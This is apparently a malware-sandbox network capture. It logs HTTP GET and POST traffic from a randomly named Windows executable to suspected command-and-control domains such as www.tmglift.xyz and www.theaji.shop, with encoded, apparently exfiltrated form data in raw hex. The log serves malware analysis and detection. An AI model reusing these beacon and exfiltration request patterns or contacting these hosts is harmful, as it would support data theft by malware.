                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:48:03.719196081 CEST527OUTGET /x85c/?AvLLLbOh=Y3mIzDGxysayARzY45AnHIIy2B4pc2sd+rPTtixWlkJfFxNC1K7RiT+8e26JUdxdhynJ2ADdGNEqJqOO4cICPBs0jMW0AIUC/yJyUu4ejJJDyAbCIM7A/9A=&7RB=66nPyLG8 HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.kiristyle.shop
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Aug 27, 2024 17:48:03.891381025 CEST500INHTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:48:03 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 162
                                                                                  Connection: close
                                                                                  Location: https://www.kiristyle.shop/x85c/?AvLLLbOh=Y3mIzDGxysayARzY45AnHIIy2B4pc2sd+rPTtixWlkJfFxNC1K7RiT+8e26JUdxdhynJ2ADdGNEqJqOO4cICPBs0jMW0AIUC/yJyUu4ejJJDyAbCIM7A/9A=&7RB=66nPyLG8
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.11.204982885.159.66.93805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:48:09.679625034 CEST785OUTPOST /fu44/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.tmglift.xyz
                                                                                  Origin: http://www.tmglift.xyz
                                                                                  Referer: http://www.tmglift.xyz/fu44/
                                                                                  Content-Length: 205
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 42 6e 6a 62 43 64 47 31 37 62 41 77 43 52 76 4b 78 42 34 49 2b 65 54 4f 62 54 49 37 78 6b 5a 6e 71 6d 71 79 56 58 6b 52 64 44 73 49 46 43 39 53 50 78 79 6d 76 31 54 4b 2f 50 53 72 72 78 4a 6f 37 2f 7a 70 66 47 47 62 63 67 55 4e 50 74 33 78 39 53 6d 34 52 58 64 49 50 35 4f 2b 59 65 6c 72 75 59 6c 5a 75 51 6c 73 77 70 55 62 75 6a 63 4a 68 63 48 33 77 70 57 52 45 4c 63 68 62 41 4e 74 5a 55 44 6d 6a 4f 50 4a 55 65 49 30 51 48 59 31 59 7a 69 2b 54 6a 5a 30 43 65 38 52 33 76 51 2b 55 53 4c 46 55 63 55 41 44 6d 4d 63 67 4e 2b 5a 47 5a 67 72 2f 56 58 46 71 32 78 34 4b 50 36 61 6d 67 3d 3d
                                                                                  Data Ascii: AvLLLbOh=BnjbCdG17bAwCRvKxB4I+eTObTI7xkZnqmqyVXkRdDsIFC9SPxymv1TK/PSrrxJo7/zpfGGbcgUNPt3x9Sm4RXdIP5O+YelruYlZuQlswpUbujcJhcH3wpWRELchbANtZUDmjOPJUeI0QHY1Yzi+TjZ0Ce8R3vQ+USLFUcUADmMcgN+ZGZgr/VXFq2x4KP6amg==
                                                                                  Aug 27, 2024 17:48:09.906615973 CEST225INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.14.1
                                                                                  Date: Tue, 27 Aug 2024 15:48:09 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  X-Rate-Limit-Limit: 5s
                                                                                  X-Rate-Limit-Remaining: 19
                                                                                  X-Rate-Limit-Reset: 2024-08-27T15:48:14.7949232Z


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.11.204982985.159.66.93805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:48:12.434484005 CEST1125OUTPOST /fu44/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.tmglift.xyz
                                                                                  Origin: http://www.tmglift.xyz
                                                                                  Referer: http://www.tmglift.xyz/fu44/
                                                                                  Content-Length: 545
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 42 6e 6a 62 43 64 47 31 37 62 41 77 45 77 2f 4b 68 57 6b 49 34 2b 54 4a 48 44 49 37 6f 55 5a 6a 71 6d 6d 79 56 57 78 4d 63 31 38 49 46 6a 4e 53 4f 77 79 6d 38 46 54 4b 71 2f 53 55 6d 52 4a 5a 37 2f 2f 58 66 48 36 62 63 67 41 4e 4f 65 2f 78 70 79 6d 35 46 48 64 50 49 35 4f 7a 53 2b 6c 68 75 59 70 2f 75 52 78 73 33 61 51 62 76 67 30 4a 79 35 7a 30 68 5a 57 58 43 4c 63 75 4f 77 4e 7a 5a 55 66 45 6a 4c 4c 5a 58 76 73 30 51 6d 34 31 4b 6a 69 39 62 54 5a 7a 4f 2b 38 46 2b 39 35 71 64 42 48 4d 48 39 30 4d 4b 45 38 47 72 36 71 70 43 6f 45 62 69 41 62 42 7a 79 4d 57 66 2b 75 53 35 72 6f 6b 44 4b 36 4e 62 59 42 37 75 72 34 74 53 69 54 30 43 61 72 64 6f 2f 35 38 39 41 64 75 2b 4c 58 62 46 41 45 47 38 46 74 4d 48 72 49 6e 41 37 68 4e 41 4e 49 57 43 72 73 78 44 65 31 62 7a 67 36 5a 4f 6e 74 65 4b 4c 34 34 5a 59 57 54 56 61 73 4d 61 56 32 4a 71 74 68 77 38 68 4b 77 61 73 6a 55 4d 76 2f 77 59 41 32 2b 33 47 4e 4f 47 77 71 49 30 51 4c 6a 68 42 43 52 36 55 43 43 6c 34 38 6a 77 4e 4f 54 46 [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=BnjbCdG17bAwEw/KhWkI4+TJHDI7oUZjqmmyVWxMc18IFjNSOwym8FTKq/SUmRJZ7//XfH6bcgANOe/xpym5FHdPI5OzS+lhuYp/uRxs3aQbvg0Jy5z0hZWXCLcuOwNzZUfEjLLZXvs0Qm41Kji9bTZzO+8F+95qdBHMH90MKE8Gr6qpCoEbiAbBzyMWf+uS5rokDK6NbYB7ur4tSiT0Cardo/589Adu+LXbFAEG8FtMHrInA7hNANIWCrsxDe1bzg6ZOnteKL44ZYWTVasMaV2Jqthw8hKwasjUMv/wYA2+3GNOGwqI0QLjhBCR6UCCl48jwNOTFL7Os876j9EkMJN0ywqBWD1cQji04UdcZ1/swrNnH3QGkmtaRfUOwuqkx7mSo7EmbOreExkf572NEQYoam+5KDpIu2Pk8fJegB38GNBboZa62YxhSw17Oh2BmSTozmwiSgHF80hz2p4XZgkF3cDA3HRHBhRFGbMHZoafXCzo6P5GPLDGbC+hcpvyT5fx213oiDXtYqAf13cyw0c=
                                                                                  Aug 27, 2024 17:48:12.659853935 CEST225INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.14.1
                                                                                  Date: Tue, 27 Aug 2024 15:48:12 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  X-Rate-Limit-Limit: 5s
                                                                                  X-Rate-Limit-Remaining: 18
                                                                                  X-Rate-Limit-Reset: 2024-08-27T15:48:14.7949232Z


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.11.204983085.159.66.93805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:48:15.200889111 CEST1289OUTPOST /fu44/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.tmglift.xyz
                                                                                  Origin: http://www.tmglift.xyz
                                                                                  Referer: http://www.tmglift.xyz/fu44/
                                                                                  Content-Length: 52933
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 42 6e 6a 62 43 64 47 31 37 62 41 77 45 77 2f 4b 68 57 6b 49 34 2b 54 4a 48 44 49 37 6f 55 5a 6a 71 6d 6d 79 56 57 78 4d 63 31 30 49 46 78 31 53 4f 54 61 6d 2f 46 54 4b 32 76 53 56 6d 52 4a 2b 37 2f 58 74 66 48 33 75 63 6a 34 4e 4e 50 76 78 70 68 4f 35 50 6e 64 4b 43 5a 4f 39 59 65 6b 36 75 59 6b 6b 75 52 6b 5a 77 70 4d 62 75 6a 73 4a 77 36 62 33 38 35 57 52 43 4c 63 69 45 51 4e 52 5a 55 61 4a 6a 4c 50 5a 58 71 30 30 52 56 41 31 5a 44 65 39 41 54 5a 77 56 4f 38 41 33 64 35 6c 64 41 69 6f 48 39 30 63 4b 47 51 47 72 39 65 70 44 72 63 59 69 67 62 42 74 69 4d 5a 4f 75 53 65 35 76 42 78 44 4b 2b 4e 62 62 42 37 75 4c 34 74 58 44 54 7a 47 36 72 54 2b 50 35 72 71 51 51 74 2b 4b 79 6f 46 43 49 47 38 78 46 4d 42 63 6f 6e 4d 35 5a 4e 4e 4e 49 59 4d 4c 73 69 4a 2b 31 66 7a 67 72 34 4f 6d 4e 6f 4b 4d 67 34 61 36 65 54 65 59 49 4c 54 56 32 4c 32 64 68 66 34 68 4f 30 61 74 4f 57 4d 76 2b 31 59 42 79 2b 33 32 39 4f 46 30 47 58 35 67 4c 6b 74 68 43 49 77 30 4f 49 6c 34 67 72 77 4f 65 36 46 [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=BnjbCdG17bAwEw/KhWkI4+TJHDI7oUZjqmmyVWxMc10IFx1SOTam/FTK2vSVmRJ+7/XtfH3ucj4NNPvxphO5PndKCZO9Yek6uYkkuRkZwpMbujsJw6b385WRCLciEQNRZUaJjLPZXq00RVA1ZDe9ATZwVO8A3d5ldAioH90cKGQGr9epDrcYigbBtiMZOuSe5vBxDK+NbbB7uL4tXDTzG6rT+P5rqQQt+KyoFCIG8xFMBconM5ZNNNIYMLsiJ+1fzgr4OmNoKMg4a6eTeYILTV2L2dhf4hO0atOWMv+1YBy+329OF0GX5gLkthCIw0OIl4grwOe6FMjOj876ncEnVJNztgqMIz0EQjfd4XRMZkjsz7dnDnQHiGtea/UIh+qkx7qGo7ImbbfeEGYf8oONIwYqam+kKDk2u2G38eY7gCb8GYlbvby9j4x4Ww1SKh7emR3gziRfTTzF9w9zyp4YcAkGwcDszHMYBhNzGb4XZrafBjW3r94YLJ/SSjq4VPnYcaHK63nFvG/0SMc3kGEpkSe7wdq+qxtDz0rrEV+jcucFa96B/dRISh5CDSNCDB/hjPnoMjZVO/THNNpkliBfWVFdVpvH/So/vniivbup1l3Xv2jomxvOTEGHsQTb/qJhXZFybXEVbxBpqAKu7beGA9YGpFVPrDs1+ciJVp7cBjlOGAtQTm8vHvZeMz
                                                                                  Aug 27, 2024 17:48:15.200937986 CEST1289OUTData Raw: 59 63 32 4e 33 6f 50 76 36 4f 53 76 78 5a 36 79 4b 63 32 52 7a 67 6b 63 54 6a 46 42 4b 51 4d 59 51 48 43 71 75 69 4f 4e 6a 43 51 4e 7a 42 32 74 78 48 46 47 50 36 64 34 46 49 62 48 4d 50 4e 53 42 7a 51 77 35 54 6f 52 6b 35 41 43 69 6f 48 36 46 59
                                                                                  Data Ascii: Yc2N3oPv6OSvxZ6yKc2RzgkcTjFBKQMYQHCquiONjCQNzB2txHFGP6d4FIbHMPNSBzQw5ToRk5ACioH6FYNOHqgYC38DOtXbPKMQS7cHGnHMgKl9nxhjaGzlxuaIRVwIjtoWGkO3TV8nG/+yLhZ+5yqm8KzPEJxUxXksRmFEmg7DvREAZ/me/q5O6fodBCDQMAfu6LQDGgGtXxfOO3yHXk1i75y/EIpJqteHSlxCTJKEmUIUKv8
                                                                                  Aug 27, 2024 17:48:15.200989962 CEST10312OUTData Raw: 4a 44 38 6e 2f 61 41 6f 6a 38 45 34 74 45 6f 68 39 6a 4d 4d 75 58 32 59 6d 50 36 31 32 6f 4f 58 76 37 78 54 2f 62 36 62 79 69 61 76 6e 4a 5a 71 5a 44 55 6c 70 76 55 38 56 44 4f 30 49 42 50 56 75 61 4a 45 66 52 46 36 4e 69 30 30 73 6a 53 77 69 57
                                                                                  Data Ascii: JD8n/aAoj8E4tEoh9jMMuX2YmP612oOXv7xT/b6byiavnJZqZDUlpvU8VDO0IBPVuaJEfRF6Ni00sjSwiWOW2HL+SKPmgE2yL15yeidSq9ToYJSDf1kyskNhT+mlpXmilLn+menGCgeip9mD1AC2U7PdnGIkwrOPcXkM9jXs5WrnDhbOJoVZsIvxmQLUnaZvtJD3dw4uMuCkGcWkvtnOw8+x1463goCTzPi/QATlGmtk0lZB1ZX
                                                                                  Aug 27, 2024 17:48:15.429632902 CEST1289OUTData Raw: 79 49 44 2b 76 55 61 38 62 6c 4f 6a 31 67 39 4c 5a 45 53 41 72 67 63 43 6d 48 76 39 6c 48 41 47 6a 55 4e 74 5a 6f 79 62 4c 66 4e 30 68 48 52 73 35 39 71 33 56 34 54 50 76 6b 38 41 42 2b 4d 79 76 61 56 4e 57 69 34 59 71 76 66 35 78 78 77 39 78 6a
                                                                                  Data Ascii: yID+vUa8blOj1g9LZESArgcCmHv9lHAGjUNtZoybLfN0hHRs59q3V4TPvk8AB+MyvaVNWi4Yqvf5xxw9xjKVtjhz9FniOuio7i6oHbI9srOkcKbL05zy+t6EkQnF2osqakDueIwFh5RjXLkOBTbAJPN6tlu9dmXuT3hFIYgJWLlEBeJ5P85BYWsHUL9T3z8mxLB4nZe7hXODeBt4ia/Ap3GdwS96pHOSPQ2zagEYfF8iPqavISL
                                                                                  Aug 27, 2024 17:48:15.429682016 CEST1289OUTData Raw: 47 35 4b 56 51 31 6d 34 6c 6e 64 32 58 7a 64 64 32 70 50 52 32 6f 4c 66 58 37 50 4b 6e 52 54 56 74 72 6f 44 2b 68 59 2b 43 35 73 71 49 33 51 7a 73 6f 45 54 44 6e 65 75 71 38 2f 4c 53 42 42 6c 77 4c 75 77 6c 6d 57 63 42 35 73 6d 34 44 47 47 42 69
                                                                                  Data Ascii: G5KVQ1m4lnd2Xzdd2pPR2oLfX7PKnRTVtroD+hY+C5sqI3QzsoETDneuq8/LSBBlwLuwlmWcB5sm4DGGBi1Uzscjbi5/Onq+gt4lNZ8z93OH+1OyKIGnEQLMpDLA89II+E0vgzC4QJ1WqizErGAbvzMWn9ysed5xP2x/79mW0bxxHj6eVV7+I0pawylSO6w1wJFnscs5U8U2h9rGSEGyHF2m1SKFqjOX2/AD0n5DHzEfkN45Zd7
                                                                                  Aug 27, 2024 17:48:15.430154085 CEST5156OUTData Raw: 61 64 68 36 48 71 78 72 74 6f 32 62 78 50 4f 62 76 41 50 7a 4a 64 55 49 32 69 48 54 42 54 2f 4f 66 4d 4f 61 34 4f 45 66 68 76 2f 54 31 51 75 71 34 59 41 48 46 51 2f 6f 79 72 4d 5a 37 32 6f 31 62 31 70 42 41 70 51 4a 72 36 43 6a 34 39 71 6f 68 59
                                                                                  Data Ascii: adh6Hqxrto2bxPObvAPzJdUI2iHTBT/OfMOa4OEfhv/T1Quq4YAHFQ/oyrMZ72o1b1pBApQJr6Cj49qohY8z9JFbMF4f7NIIUoWLrEZfkpoW62pGznKdJUHaCuDCzJd5IZy9LJ7DngoP2cKWrAL/vLzwwg4XjqESzPoDhYatWk7PffCQFtwhHJ7qZAVsjAlJXj1XCQmDVovzezYpo7LHcy3rI81wWYUGWkYbrvX9TQfZasLV9Xj
                                                                                  Aug 27, 2024 17:48:15.430371046 CEST2578OUTData Raw: 6b 51 4a 55 50 69 76 6d 35 5a 73 5a 2b 6b 63 34 77 7a 48 50 6a 6c 51 74 76 36 65 69 6c 74 2f 4f 64 38 65 56 47 49 62 51 4e 35 72 76 79 65 38 61 39 71 32 58 56 46 2b 41 55 38 36 56 59 54 6e 75 4f 33 49 71 47 67 56 64 30 2f 59 4d 76 57 67 55 79 44
                                                                                  Data Ascii: kQJUPivm5ZsZ+kc4wzHPjlQtv6eilt/Od8eVGIbQN5rvye8a9q2XVF+AU86VYTnuO3IqGgVd0/YMvWgUyDyMTJwRJH4Qx7WRQhzpHotwNBRp/06I3mMwgLuMN8Ke+UrkaHvZUsXiLgIT0v+z9JeKxCrBGCOtTcwIBJiNhnhpN5bF8ufMQN4oBYRHIHqBZAVbF0tTbJJorkhwlxs8NqQ6605DhCZFPy1n2ZMlEHFgziZ+qFzJh/x
                                                                                  Aug 27, 2024 17:48:15.430541992 CEST2578OUTData Raw: 65 78 72 46 70 62 61 32 78 64 33 33 6b 4d 41 36 57 34 56 6e 66 65 33 56 34 37 36 47 59 54 66 78 68 78 45 79 42 49 6f 62 49 34 5a 66 4e 79 37 6b 61 35 67 5a 4d 78 76 6a 70 77 61 47 31 77 67 77 38 46 6b 54 42 76 32 41 74 36 4b 6c 7a 30 37 37 4f 63
                                                                                  Data Ascii: exrFpba2xd33kMA6W4Vnfe3V476GYTfxhxEyBIobI4ZfNy7ka5gZMxvjpwaG1wgw8FkTBv2At6Klz077OcdFGA2xPEokT9dnNXV3142oYEqFg/CIXnfAE+QiFs9mDpmhXjBEvpNAtrg546Dk4RK0/SlGnd83kR85aPS/vlEzEfUwp617sytJmnytW9bBhNvLPpYOADR0PxEb80lcD1LoyIU/o8nF2YkoSyQmNCmtDuqAKQ3l+Gi
                                                                                  Aug 27, 2024 17:48:15.430762053 CEST5156OUTData Raw: 72 2f 37 4c 47 37 56 43 71 70 6d 6a 76 46 43 59 2f 37 34 72 48 54 41 6c 54 6c 7a 63 44 6c 70 37 74 6b 61 58 6b 67 6c 51 58 47 32 61 56 6d 6f 71 62 62 34 6d 55 66 7a 42 2b 33 36 46 64 45 62 6a 4f 59 30 34 53 59 73 37 62 68 7a 70 4b 38 36 48 64 4c
                                                                                  Data Ascii: r/7LG7VCqpmjvFCY/74rHTAlTlzcDlp7tkaXkglQXG2aVmoqbb4mUfzB+36FdEbjOY04SYs7bhzpK86HdLyQJDQchyv+chhWKU4mOy4w1/U1UxKXtqL+jLXXY85iFtKPtSugfvPALxiiMtvQhl7YQjsuApjdT4poQf4IStiLTFzPSf8YYZdgM4AImuyUZZk7+/lUT8FRMPhPwKocki0q5X94OaXEtUSiu6h3DjkaoSx5ivSuhr2
                                                                                  Aug 27, 2024 17:48:15.431101084 CEST2578OUTData Raw: 55 36 50 78 48 4e 79 33 53 59 64 51 70 5a 78 2b 76 49 49 77 2b 67 6f 4b 51 46 46 48 43 42 77 69 33 6c 53 37 53 76 38 6d 4d 4e 2b 68 62 58 7a 75 4a 36 6b 5a 70 4b 30 4f 79 6f 4f 31 7a 33 54 52 79 4a 39 79 68 66 39 79 76 74 34 39 4d 53 6f 48 7a 50
                                                                                  Data Ascii: U6PxHNy3SYdQpZx+vIIw+goKQFFHCBwi3lS7Sv8mMN+hbXzuJ6kZpK0OyoO1z3TRyJ9yhf9yvt49MSoHzPTZADUS5cL4LH3SGGnBkcxovXsO3RuItcXqbjVrAzzIv7B7wa6DwnBX4uJFnc9w362V0W7ysqXa38Yw1k44maZA+RqmZ5lrP8w9dhz6Z1CgHQPUCZmCcwyU0l3KJRhofyr6nfciLtFKlCh5OAwUZ+rqH9pF3X4ZJ+q
                                                                                  Aug 27, 2024 17:48:15.431442976 CEST2578OUTData Raw: 6b 77 62 66 76 53 65 47 79 51 70 37 4a 59 61 58 35 52 69 39 6c 75 78 59 76 6a 67 76 74 75 5a 6f 45 36 31 31 45 53 54 64 61 49 46 30 34 2f 7a 6e 77 79 4b 30 4f 59 64 30 68 32 37 59 46 33 73 71 65 74 36 77 2f 74 32 4b 68 49 2f 74 35 63 6e 61 44 72
                                                                                  Data Ascii: kwbfvSeGyQp7JYaX5Ri9luxYvjgvtuZoE611ESTdaIF04/znwyK0OYd0h27YF3sqet6w/t2KhI/t5cnaDrwST2Cw9xCIKgYUOSDppOiA9JPn6UKuH//vdor3QZV4kIe6XIIBylzBr1qOkoiNR4A5cNnE6nVU4W8ctCcT5ab/gMcUFS74hzcugtbBsiY2N6tBGRIY6H8L3pYcH/9OAJlevvFp/0zB2r71naDEirhSsQijxqpig1K
                                                                                  Aug 27, 2024 17:48:15.882319927 CEST225INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.14.1
                                                                                  Date: Tue, 27 Aug 2024 15:48:15 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  X-Rate-Limit-Limit: 5s
                                                                                  X-Rate-Limit-Remaining: 19
                                                                                  X-Rate-Limit-Reset: 2024-08-27T15:48:20.7715590Z


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  25192.168.11.204983185.159.66.93805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:48:17.961724997 CEST524OUTGET /fu44/?AvLLLbOh=MlL7Bon/74QoG2vpxD8T9dipagYbr0R/tXGKYkMRJkwHHENkeAO2oHPD98qp5zZW/5TdXnrAZisENNCTsRHdM0U4DZ3reu4ViZt4mxUl7os1vic25L7j48U=&7RB=66nPyLG8 HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.tmglift.xyz
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Aug 27, 2024 17:48:18.187541962 CEST225INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.14.1
                                                                                  Date: Tue, 27 Aug 2024 15:48:18 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  X-Rate-Limit-Limit: 5s
                                                                                  X-Rate-Limit-Remaining: 19
                                                                                  X-Rate-Limit-Reset: 2024-08-27T15:48:23.0765341Z


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  26192.168.11.20498323.82.56.39805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:48:31.600583076 CEST785OUTPOST /q3za/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.theaji.shop
                                                                                  Origin: http://www.theaji.shop
                                                                                  Referer: http://www.theaji.shop/q3za/
                                                                                  Content-Length: 205
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 63 55 50 67 4f 34 30 69 75 4c 7a 6d 72 56 52 6d 6f 4f 67 72 7a 2b 68 79 32 59 47 78 4a 4f 6d 6c 61 77 72 38 79 47 64 73 4c 6b 55 45 63 70 44 77 2f 62 2f 31 4b 2f 35 72 6b 46 59 41 37 59 32 69 71 6f 64 4b 30 64 51 65 77 4e 38 31 51 73 63 54 31 70 49 77 35 41 5a 45 42 62 6e 37 56 73 57 33 6a 49 75 78 65 55 46 2f 49 4b 43 6f 66 36 54 58 47 63 66 63 49 4b 76 47 2f 6a 58 31 68 79 32 58 61 31 75 4f 67 78 5a 73 4c 44 59 6c 5a 76 76 4d 53 69 6d 39 6e 72 75 41 4f 58 68 31 79 51 48 6e 72 6d 6f 6a 4b 71 37 33 4f 74 33 66 64 2b 6d 48 68 33 47 54 31 72 6c 4c 44 78 33 41 67 42 2f 55 31 51 3d 3d
                                                                                  Data Ascii: AvLLLbOh=cUPgO40iuLzmrVRmoOgrz+hy2YGxJOmlawr8yGdsLkUEcpDw/b/1K/5rkFYA7Y2iqodK0dQewN81QscT1pIw5AZEBbn7VsW3jIuxeUF/IKCof6TXGcfcIKvG/jX1hy2Xa1uOgxZsLDYlZvvMSim9nruAOXh1yQHnrmojKq73Ot3fd+mHh3GT1rlLDx3AgB/U1Q==
                                                                                  Aug 27, 2024 17:48:31.702380896 CEST457INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 27 Aug 2024 15:48:31 GMT
                                                                                  Server: Apache/2.4.58 (Ubuntu)
                                                                                  Content-Length: 277
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 68 65 61 6a 69 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at www.theaji.shop Port 80</address></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  27192.168.11.20498333.82.56.39805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
